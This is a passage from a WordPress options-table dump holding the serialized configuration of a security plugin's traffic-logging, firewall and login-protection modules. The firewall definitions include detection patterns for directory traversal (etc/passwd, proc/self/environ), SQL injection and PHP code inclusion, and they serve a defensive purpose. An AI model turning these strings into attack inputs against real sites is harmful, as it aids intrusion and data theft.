Module\";s:9:\"beacon_id\";i:153;s:7:\"summary\";a:2:{i:0;s:89:\"Purpose - The Traffic Watch module lets you monitor and review all requests to your site.\";i:1;s:103:\"Recommendation - Required only if you need to review and investigate and monitor requests to your site.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:9:{s:14:\"enable_traffic\";a:11:{s:3:\"key\";s:14:\"enable_traffic\";s:7:\"section\";s:37:\"section_enable_plugin_feature_traffic\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/ed\";s:9:\"link_blog\";s:19:\"https://shsec.io/ee\";s:9:\"beacon_id\";i:153;s:4:\"name\";s:20:\"Enable Traffic Watch\";s:7:\"summary\";s:44:\"Enable (or Disable) The Traffic Watch Module\";s:11:\"description\";s:73:\"Un-Checking this option will completely disable the Traffic Watch module.\";}s:13:\"enable_logger\";a:10:{s:3:\"key\";s:13:\"enable_logger\";s:7:\"section\";s:23:\"section_traffic_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/hf\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:153;s:4:\"name\";s:21:\"Enable Traffic Logger\";s:7:\"summary\";s:35:\"Turn On The Traffic Logging Feature\";s:11:\"description\";s:71:\"Enable or disable the ability to log and monitor requests to your site.\";}s:15:\"type_exclusions\";a:12:{s:3:\"key\";s:15:\"type_exclusions\";s:7:\"section\";s:23:\"section_traffic_options\";s:4:\"type\";s:15:\"multiple_select\";s:8:\"advanced\";b:1;s:7:\"default\";a:5:{i:0;s:9:\"logged_in\";i:1;s:6:\"server\";i:2;s:4:\"cron\";i:3;s:6:\"search\";i:4;s:6:\"uptime\";}s:13:\"value_options\";a:8:{i:0;a:2:{s:9:\"value_key\";s:6:\"simple\";s:4:\"text\";s:15:\"Simple Requests\";}i:1;a:2:{s:9:\"value_key\";s:3:\"api\";s:4:\"text\";s:8:\"REST API\";}i:2;a:2:{s:9:\"value_key\";s:4:\"ajax\";s:4:\"text\";s:4:\"AJAX\";}i:3;a:2:{s:9:\"value_key\";s:9:\"logged_in\";s:4:\"text\";s:15:\"Logged-In Users\";}i:4;a:2:{s:9:\"value_key\";s:4:\"cron\";s:4:\"text\";s:7:\"WP CRON\";}i:5;a:2:{s:9:\"value_key\";s:6:\"server\";s:4:\"text\";s:11:\"This Server\";}i:6;a:2:{s:9:\"value_key\";s:6:\"search\";s:4:\"text\";s:14:\"Search Engines\";}i:7;a:2:{s:9:\"value_key\";s:6:\"uptime\";s:4:\"text\";s:26:\"Uptime Monitoring Services\";}}s:9:\"link_info\";s:19:\"https://shsec.io/eb\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:154;s:4:\"name\";s:22:\"Traffic Log Exclusions\";s:7:\"summary\";s:41:\"Select Which Types Of Requests To Exclude\";s:11:\"description\";s:74:\"Deselect any requests that you don\'t want to appear in the traffic viewer.\";}s:17:\"custom_exclusions\";a:12:{s:3:\"key\";s:17:\"custom_exclusions\";s:7:\"section\";s:23:\"section_traffic_options\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/ec\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:154;s:4:\"name\";s:17:\"Custom Exclusions\";s:7:\"summary\";s:33:\"Provide Custom Traffic Exclusions\";s:11:\"description\";s:98:\"For each entry, if the text is present in either the User Agent or Page/Path, it will be excluded.\";}s:10:\"auto_clean\";a:11:{s:3:\"key\";s:10:\"auto_clean\";s:7:\"section\";s:23:\"section_traffic_options\";s:8:\"advanced\";b:1;s:7:\"default\";i:7;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Auto Expiry Cleaning\";s:7:\"summary\";s:30:\"Enable Traffic Log Auto Expiry\";s:11:\"description\";s:78:\"Automated DB cleanup will delete logs older than this maximum value (in days).\";}s:14:\"enable_limiter\";a:11:{s:3:\"key\";s:14:\"enable_limiter\";s:7:\"section\";s:23:\"section_traffic_limiter\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/gw\";s:9:\"link_blog\";s:19:\"https://shsec.io/gx\";s:9:\"beacon_id\";i:420;s:4:\"name\";s:20:\"Enable Rate Limiting\";s:7:\"summary\";s:33:\"Turn On The Rate Limiting Feature\";s:11:\"description\";s:87:\"Enable or disable the rate limiting feature according to your rate limiting parameters.\";}s:14:\"limit_requests\";a:10:{s:3:\"key\";s:14:\"limit_requests\";s:7:\"section\";s:23:\"section_traffic_limiter\";s:7:\"default\";s:2:\"60\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Max Request Limit\";s:7:\"summary\";s:48:\"Maximum Number Of Requests Allowed In Time Limit\";s:11:\"description\";s:72:\"The maximum number of requests that are allowed in the given time limit.\";}s:15:\"limit_time_span\";a:10:{s:3:\"key\";s:15:\"limit_time_span\";s:7:\"section\";s:23:\"section_traffic_limiter\";s:7:\"default\";s:2:\"60\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:27:\"Request Limit Time Interval\";s:7:\"summary\";s:48:\"The Time Interval To Test For Excessive Requests\";s:11:\"description\";s:84:\"The time limit within which to monitor for excessive requests that exceed the limit.\";}s:20:\"legacy_db_deleted_at\";a:5:{s:3:\"key\";s:20:\"legacy_db_deleted_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";i:0;}}s:11:\"definitions\";a:4:{s:10:\"db_classes\";a:1:{s:7:\"traffic\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Traffic\\Handler\";}s:16:\"db_table_traffic\";a:2:{s:4:\"slug\";s:7:\"traffic\";s:11:\"cols_custom\";a:8:{s:3:\"rid\";s:52:\"varchar(10) NOT NULL DEFAULT \'\' COMMENT \'Request ID\'\";s:3:\"uid\";s:53:\"int(11) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'User ID\'\";s:2:\"ip\";s:55:\"varbinary(16) DEFAULT NULL COMMENT \'Visitor IP Address\'\";s:4:\"path\";s:54:\"text NOT NULL DEFAULT \'\' COMMENT \'Request Path or URI\'\";s:4:\"code\";s:58:\"int(5) NOT NULL DEFAULT \'200\' COMMENT \'HTTP Response Code\'\";s:4:\"verb\";s:56:\"varchar(10) NOT NULL DEFAULT \'get\' COMMENT \'HTTP Method\'\";s:2:\"ua\";s:40:\"text COMMENT \'Browser User Agent String\'\";s:5:\"trans\";s:61:\"tinyint(1) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Trangression\'\";}}s:18:\"traffic_table_name\";s:7:\"traffic\";s:6:\"events\";a:1:{s:22:\"request_limit_exceeded\";a:3:{s:12:\"audit_params\";a:3:{i:0;s:8:\"requests\";i:1;s:5:\"count\";i:2;s:4:\"span\";}s:5:\"level\";s:5:\"alert\";s:7:\"offense\";b:1;}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510344,'_site_transient_timeout_shield_mod_config_firewall','1632920474','no'),(510345,'_site_transient_shield_mod_config_firewall','a:6:{s:4:\"slug\";s:8:\"firewall\";s:10:\"properties\";a:14:{s:4:\"slug\";s:8:\"firewall\";s:4:\"name\";s:8:\"Firewall\";s:12:\"sidebar_name\";s:8:\"Firewall\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:8:\"firewall\";s:7:\"tagline\";s:61:\"Automatically block malicious URLs and data sent to your site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:30;}s:8:\"sections\";a:6:{i:0;a:6:{s:4:\"slug\";s:33:\"section_firewall_blocking_options\";s:7:\"primary\";b:1;s:5:\"title\";s:25:\"Firewall Blocking Options\";s:11:\"title_short\";s:17:\"Firewall Blocking\";s:9:\"beacon_id\";i:333;s:7:\"summary\";a:2:{i:0;s:56:\"Here you choose what kind of malicious data to scan for.\";i:1;s:198:\"Recommendation - Turn on as many options here as you can. If you find an incompatibility or something stops working, un-check 1 option at a time until you find the problem or review the Audit Trail.\";}}i:1;a:5:{s:4:\"slug\";s:38:\"section_choose_firewall_block_response\";s:5:\"title\";s:30:\"Choose Firewall Block Response\";s:11:\"title_short\";s:17:\"Firewall Response\";s:9:\"beacon_id\";i:334;s:7:\"summary\";a:2:{i:0;s:75:\"Here you choose how the plugin will respond when it detects malicious data.\";i:1;s:54:\"Recommendation - Choose the option \'Die With Message\'.\";}}i:2;a:5:{s:4:\"slug\";s:17:\"section_whitelist\";s:5:\"title\";s:71:\"Whitelists - IPs, Pages, Parameters, and Users that bypass the Firewall\";s:11:\"title_short\";s:9:\"Whitelist\";s:9:\"beacon_id\";i:335;s:7:\"summary\";a:2:{i:0;s:124:\"In principle you should not need to whitelist anything or anyone unless you have discovered a collision with another plugin.\";i:1;s:90:\"Recommendation - Do not whitelist anything unless you are confident in what you are doing.\";}}i:3;a:5:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:9:\"beacon_id\";i:139;s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:4;a:5:{s:4:\"slug\";s:48:\"section_enable_plugin_feature_wordpress_firewall\";s:5:\"title\";s:23:\"Enable Module: Firewall\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:253;s:7:\"summary\";a:2:{i:0;s:123:\"Purpose - The Firewall is designed to analyse data sent to your website and block any requests that appear to be malicious.\";i:1;s:53:\"Recommendation - Keep the Firewall feature turned on.\";}}i:5;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:14:{s:15:\"enable_firewall\";a:11:{s:3:\"key\";s:15:\"enable_firewall\";s:7:\"section\";s:48:\"section_enable_plugin_feature_wordpress_firewall\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/43\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf01\";s:9:\"beacon_id\";i:253;s:4:\"name\";s:15:\"Enable Firewall\";s:7:\"summary\";s:39:\"Enable (or Disable) The Firewall module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Firewall module\";}s:19:\"block_dir_traversal\";a:9:{s:3:\"key\";s:19:\"block_dir_traversal\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Directory Traversals\";s:7:\"summary\";s:26:\"Block Directory Traversals\";s:11:\"description\";s:71:\"This will block directory traversal paths in in application parameters.\";}s:17:\"block_sql_queries\";a:9:{s:3:\"key\";s:17:\"block_sql_queries\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"SQL Queries\";s:7:\"summary\";s:17:\"Block SQL Queries\";s:11:\"description\";s:46:\"This will block SQL in application parameters.\";}s:21:\"block_wordpress_terms\";a:9:{s:3:\"key\";s:21:\"block_wordpress_terms\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"WordPress Terms\";s:7:\"summary\";s:30:\"Block WordPress Specific Terms\";s:11:\"description\";s:91:\"This will block WordPress specific terms in application parameters (wp_, user_login, etc.).\";}s:22:\"block_field_truncation\";a:9:{s:3:\"key\";s:22:\"block_field_truncation\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Field Truncation\";s:7:\"summary\";s:30:\"Block Field Truncation Attacks\";s:11:\"description\";s:66:\"This will block field truncation attacks in application parameters\";}s:14:\"block_php_code\";a:9:{s:3:\"key\";s:14:\"block_php_code\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:8:\"PHP Code\";s:7:\"summary\";s:23:\"Block PHP Code Includes\";s:11:\"description\";s:132:\"This will block any data that appears to try and include PHP files. Will probably block saving within the Plugin/Theme file editors.\";}s:22:\"block_exe_file_uploads\";a:9:{s:3:\"key\";s:22:\"block_exe_file_uploads\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Exe File Uploads\";s:7:\"summary\";s:29:\"Block Executable File Uploads\";s:11:\"description\";s:59:\"This will block executable file uploads (.php, .exe, etc.).\";}s:20:\"block_leading_schema\";a:10:{s:3:\"key\";s:20:\"block_leading_schema\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Leading Schemas\";s:7:\"summary\";s:36:\"Block Leading Schemas (HTTPS / HTTP)\";s:11:\"description\";s:135:\"This will block leading schemas http:// and https:// in application parameters (off by default; may cause problems with other plugins).\";}s:16:\"block_aggressive\";a:10:{s:3:\"key\";s:16:\"block_aggressive\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Aggressive Scan\";s:7:\"summary\";s:23:\"Aggressively Block Data\";s:11:\"description\";s:159:\"Employs a set of aggressive rules to detect and block malicious data submitted to your site. Warning - May cause an increase in false-positive firewall blocks.\";}s:14:\"block_response\";a:12:{s:3:\"key\";s:14:\"block_response\";s:7:\"section\";s:38:\"section_choose_firewall_block_response\";s:8:\"advanced\";b:1;s:7:\"default\";s:20:\"redirect_die_message\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:20:\"redirect_die_message\";s:4:\"text\";s:16:\"Die With Message\";}i:1;a:2:{s:9:\"value_key\";s:12:\"redirect_die\";s:4:\"text\";s:3:\"Die\";}i:2;a:2:{s:9:\"value_key\";s:13:\"redirect_home\";s:4:\"text\";s:21:\"Redirect To Home Page\";}i:3;a:2:{s:9:\"value_key\";s:12:\"redirect_404\";s:4:\"text\";s:10:\"Return 404\";}}s:9:\"beacon_id\";i:334;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Block Response\";s:7:\"summary\";s:50:\"How the firewall responds when it blocks a request\";s:11:\"description\";s:100:\"We recommend dying with a message so you know what might have occurred when the firewall blocks you.\";}s:16:\"block_send_email\";a:9:{s:3:\"key\";s:16:\"block_send_email\";s:7:\"section\";s:38:\"section_choose_firewall_block_response\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Send Email Report\";s:7:\"summary\";s:89:\"When a visitor is blocked the firewall will send an email to the configured email address\";s:11:\"description\";s:124:\"Use with caution - if you get hit by automated bots you may send out too many emails and you could get blocked by your host.\";}s:21:\"page_params_whitelist\";a:11:{s:3:\"key\";s:21:\"page_params_whitelist\";s:7:\"section\";s:17:\"section_whitelist\";s:8:\"advanced\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:21:\"comma_separated_lists\";s:9:\"link_info\";s:19:\"https://shsec.io/2a\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:335;s:4:\"name\";s:20:\"Whitelist Parameters\";s:7:\"summary\";s:74:\"Detail pages and parameters that are whitelisted (ignored by the firewall)\";s:11:\"description\";s:104:\"This should be used with caution and you should only provide parameter names that you must have excluded\";}s:16:\"whitelist_admins\";a:10:{s:3:\"key\";s:16:\"whitelist_admins\";s:7:\"section\";s:17:\"section_whitelist\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Ignore Administrators\";s:7:\"summary\";s:21:\"Ignore Administrators\";s:11:\"description\";s:78:\"Authenticated administrator users will not be processed by the firewall rules.\";}s:16:\"text_firewalldie\";a:12:{s:3:\"key\";s:16:\"text_firewalldie\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"beacon_id\";i:139;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Firewall Block Message\";s:7:\"summary\";s:63:\"Message Displayed To Visitor When A Firewall Block Is Triggered\";s:11:\"description\";s:102:\"When you select the option to display a message to the visitor, this is the message that is displayed.\";}}s:11:\"definitions\";a:3:{s:17:\"default_whitelist\";a:14:{s:29:\"/wp-admin/options-general.php\";a:0:{}s:21:\"/wp-admin/options.php\";a:2:{i:0;s:4:\"home\";i:1;s:7:\"siteurl\";}s:21:\"/wp-admin/plugins.php\";a:1:{i:0;s:6:\"plugin\";}s:22:\"/wp-admin/post-new.php\";a:0:{}s:22:\"/wp-admin/page-new.php\";a:0:{}s:22:\"/wp-admin/link-add.php\";a:0:{}s:26:\"/wp-admin/media-upload.php\";a:0:{}s:19:\"/wp-admin/admin.php\";a:1:{i:0;s:4:\"page\";}s:18:\"/wp-admin/post.php\";a:1:{i:0;s:7:\"content\";}s:27:\"/wp-admin/plugin-editor.php\";a:1:{i:0;s:10:\"newcontent\";}s:18:\"/wp-admin/page.php\";a:0:{}s:24:\"/wp-admin/admin-ajax.php\";a:0:{}s:21:\"/wp-comments-post.php\";a:2:{i:0;s:3:\"url\";i:1;s:7:\"comment\";}s:1:\"*\";a:31:{i:0;s:12:\"affwp_action\";i:1;s:7:\"ajaxurl\";i:2;s:20:\"g-recaptcha-response\";i:3;s:11:\"verify_sign\";i:4;s:6:\"txn_id\";i:5;s:15:\"wp_http_referer\";i:6;s:16:\"_wp_http_referer\";i:7;s:25:\"_wp_original_http_referer\";i:8;s:11:\"JCS_INENREF\";i:9;s:5:\"pass1\";i:10;s:10:\"pass1-text\";i:11;s:3:\"pwd\";i:12;s:3:\"url\";i:13;s:10:\"referredby\";i:14;s:11:\"redirect_to\";i:15;s:28:\"jetpack_sso_original_request\";i:16;s:23:\"jetpack_sso_redirect_to\";i:17;s:33:\"/^wordpress_logged_in_[0-9a-f]+$/\";i:18;s:10:\"edd_action\";i:19;s:12:\"edd_redirect\";i:20;s:10:\"wpcf7-form\";i:21;s:20:\"yoast_wpseo_metadesc\";i:22;s:26:\"icwp_wpsf_new_u2f_response\";i:23;s:17:\"icwp_wpsf_u2f_otp\";i:24;s:5:\"appId\";i:25;s:8:\"/^et_.*/\";i:26;s:10:\"ping_sites\";i:27;s:20:\"aioseo-post-settings\";i:28;s:14:\"joe-chnlcustid\";i:29;s:12:\"spd-custhash\";i:30;s:12:\"joe-custinfo\";}}s:17:\"firewall_patterns\";a:8:{s:12:\"dirtraversal\";a:1:{s:6:\"simple\";a:8:{i:0;s:10:\"etc/passwd\";i:1;s:17:\"proc/self/environ\";i:2;s:10:\"etc/passwd\";i:3;s:8:\"makefile\";i:4;s:7:\"wwwroot\";i:5;s:10:\"pingserver\";i:6;s:3:\"../\";i:7;s:8:\"loopback\";}}s:7:\"wpterms\";a:2:{s:6:\"simple\";a:2:{i:0;s:4:\"/**/\";i:1;s:13:\"wp-config.php\";}s:5:\"regex\";a:3:{i:0;s:4:\"^wp_\";i:1;s:11:\"^user_login\";i:2;s:10:\"^user_pass\";}}s:15:\"fieldtruncation\";a:1:{s:5:\"regex\";a:2:{i:0;s:7:\"\\s{49,}\";i:1;s:4:\"\\x00\";}}s:10:\"sqlqueries\";a:1:{s:5:\"regex\";a:3:{i:0;s:11:\"concat\\s*\\(\";i:1;s:12:\"group_concat\";i:2;s:13:\"union.*select\";}}s:7:\"exefile\";a:1:{s:5:\"regex\";a:1:{i:0;s:86:\"\\.(dll|rb|py|exe|php[3-6]?|pl|perl|ph[34]|phl|phtml|phtm|sql|ini|jsp|asp|git|svn|tar)$\";}}s:6:\"schema\";a:2:{s:6:\"simple\";a:1:{i:0;s:6:\".shtml\";}s:5:\"regex\";a:1:{i:0;s:23:\"^(http|https|ftp|file):\";}}s:7:\"phpcode\";a:2:{s:6:\"simple\";N;s:5:\"regex\";a:1:{i:0;s:52:\"(include|include_once|require|require_once)\\s*\\(.*\\)\";}}s:10:\"aggressive\";a:2:{s:6:\"simple\";a:11:{i:0;s:5:\"eval(\";i:1;s:6:\"(null)\";i:2;s:7:\"base64_\";i:3;s:9:\"localhost\";i:4;s:10:\"(function(\";i:5;s:8:\"{x.html(\";i:6;s:7:\").html(\";i:7;s:3:\"...\";i:8;s:10:\"/httpdocs/\";i:9;s:5:\"/tmp/\";i:10;s:8:\"boot.ini\";}s:5:\"regex\";a:5:{i:0;s:16:\"GLOBALS(=|\\[|%%)\";i:1;s:16:\"REQUEST(=|\\[|%%)\";i:2;s:24:\"(`|\\<|\\>|\\[|\\]|\\{|\\}|\\?)\";i:3;s:32:\"drop\\s+table\\s+(`|\'?)[a-z0-9]+\\1\";i:4;s:53:\"\'\\s+OR\\s+\'([a-z0-9]+)\'\\s*=\\s*\'\\1\'\\s+(--|\\(\\{|\\/\\*)\\s+\";}}}s:6:\"events\";a:4:{s:10:\"check_skip\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:4:\"path\";}s:5:\"level\";s:5:\"debug\";s:4:\"stat\";b:0;}s:14:\"firewall_block\";a:4:{s:12:\"audit_params\";a:6:{i:0;s:4:\"name\";i:1;s:4:\"term\";i:2;s:5:\"param\";i:3;s:5:\"value\";i:4;s:4:\"scan\";i:5;s:4:\"type\";}s:5:\"level\";s:7:\"warning\";s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:13:\"fw_email_fail\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:2:\"to\";}s:5:\"level\";s:7:\"warning\";s:4:\"stat\";b:0;}s:16:\"fw_email_success\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:2:\"to\";}s:5:\"level\";s:5:\"debug\";s:4:\"stat\";b:0;}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510346,'_site_transient_timeout_shield_mod_config_login_protect','1632920474','no'),(510347,'_site_transient_shield_mod_config_login_protect','a:7:{s:4:\"slug\";s:13:\"login_protect\";s:10:\"properties\";a:14:{s:4:\"slug\";s:13:\"login_protect\";s:4:\"name\";s:11:\"Login Guard\";s:12:\"sidebar_name\";s:16:\"Login Protection\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:12:\"loginprotect\";s:7:\"tagline\";s:83:\"Block brute force attacks and secure user identities with Two-Factor Authentication\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:40;}s:13:\"admin_notices\";a:1:{s:23:\"email-verification-sent\";a:7:{s:2:\"id\";s:23:\"email-verification-sent\";s:8:\"schedule\";s:10:\"conditions\";s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:7:\"warning\";s:12:\"plugin_admin\";s:3:\"yes\";s:11:\"valid_admin\";b:1;}}s:8:\"sections\";a:9:{i:0;a:6:{s:4:\"slug\";s:36:\"section_brute_force_login_protection\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Brute Force Login Guard\";s:11:\"title_short\";s:11:\"Brute Force\";s:9:\"beacon_id\";i:325;s:7:\"summary\";a:2:{i:0;s:87:\"Purpose - Blocks brute force hacking attacks against your login and registration pages.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:5:{s:4:\"slug\";s:17:\"section_2fa_email\";s:5:\"title\";s:31:\"Email Two-Factor Authentication\";s:11:\"title_short\";s:11:\"2FA - Email\";s:9:\"beacon_id\";i:246;s:7:\"summary\";a:3:{i:0;s:102:\"Purpose - Verifies the identity of users who log in to your site using email-based one-time-passwords.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:2;a:5:{s:4:\"slug\";s:14:\"section_2fa_ga\";s:5:\"title\";s:46:\"Google Authenticator Two-Factor Authentication\";s:11:\"title_short\";s:26:\"2FA - Google Authenticator\";s:9:\"beacon_id\";i:244;s:7:\"summary\";a:3:{i:0;s:111:\"Purpose - Verifies the identity of users who log in to your site using Google Authenticator one-time-passwords.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:3;a:5:{s:4:\"slug\";s:31:\"section_hardware_authentication\";s:5:\"title\";s:32:\"Hardware 2-Factor Authentication\";s:11:\"title_short\";s:14:\"2FA - Hardware\";s:9:\"beacon_id\";i:249;s:7:\"summary\";a:2:{i:0;s:98:\"Purpose - Verifies the identity of users who log in to your site using Yubikey one-time-passwords.\";i:1;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:4;a:5:{s:4:\"slug\";s:34:\"section_multifactor_authentication\";s:5:\"title\";s:27:\"Multi-Factor Authentication\";s:11:\"title_short\";s:13:\"2-Factor Auth\";s:9:\"beacon_id\";i:326;s:7:\"summary\";a:3:{i:0;s:103:\"Purpose - Verifies the identity of users who log in to your site - i.e. they are who they say they are.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:5;a:5:{s:4:\"slug\";s:22:\"section_rename_wplogin\";s:5:\"title\";s:18:\"Hide WP Login Page\";s:11:\"title_short\";s:15:\"Hide Login Page\";s:9:\"beacon_id\";i:316;s:7:\"summary\";a:2:{i:0;s:142:\"Purpose - To hide your wp-login.php page from brute force attacks and hacking attempts - if your login page cannot be found, no-one can login.\";i:1;s:145:\"Recommendation - This is not required for complete security and if your site has irregular or inconsistent configuration it may not work for you.\";}}i:6;a:5:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:13:\"User Messages\";s:11:\"title_short\";s:13:\"User Messages\";s:9:\"beacon_id\";i:139;s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:7;a:5:{s:4:\"slug\";s:46:\"section_enable_plugin_feature_login_protection\";s:5:\"title\";s:26:\"Disable Login Guard Module\";s:11:\"title_short\";s:7:\"Disable\";s:9:\"beacon_id\";i:249;s:7:\"summary\";a:2:{i:0;s:91:\"Purpose - Login Guard blocks all automated and brute force attempts to log in to your site.\";i:1;s:55:\"Recommendation - Keep the Login Guard module turned on.\";}}i:8;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:24:{s:20:\"enable_login_protect\";a:11:{s:3:\"key\";s:20:\"enable_login_protect\";s:7:\"section\";s:46:\"section_enable_plugin_feature_login_protection\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/51\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf03\";s:9:\"beacon_id\";i:249;s:4:\"name\";s:18:\"Enable Login Guard\";s:7:\"summary\";s:42:\"Enable (or Disable) The Login Guard Module\";s:11:\"description\";s:70:\"Un-Checking this option will completely disable the Login Guard 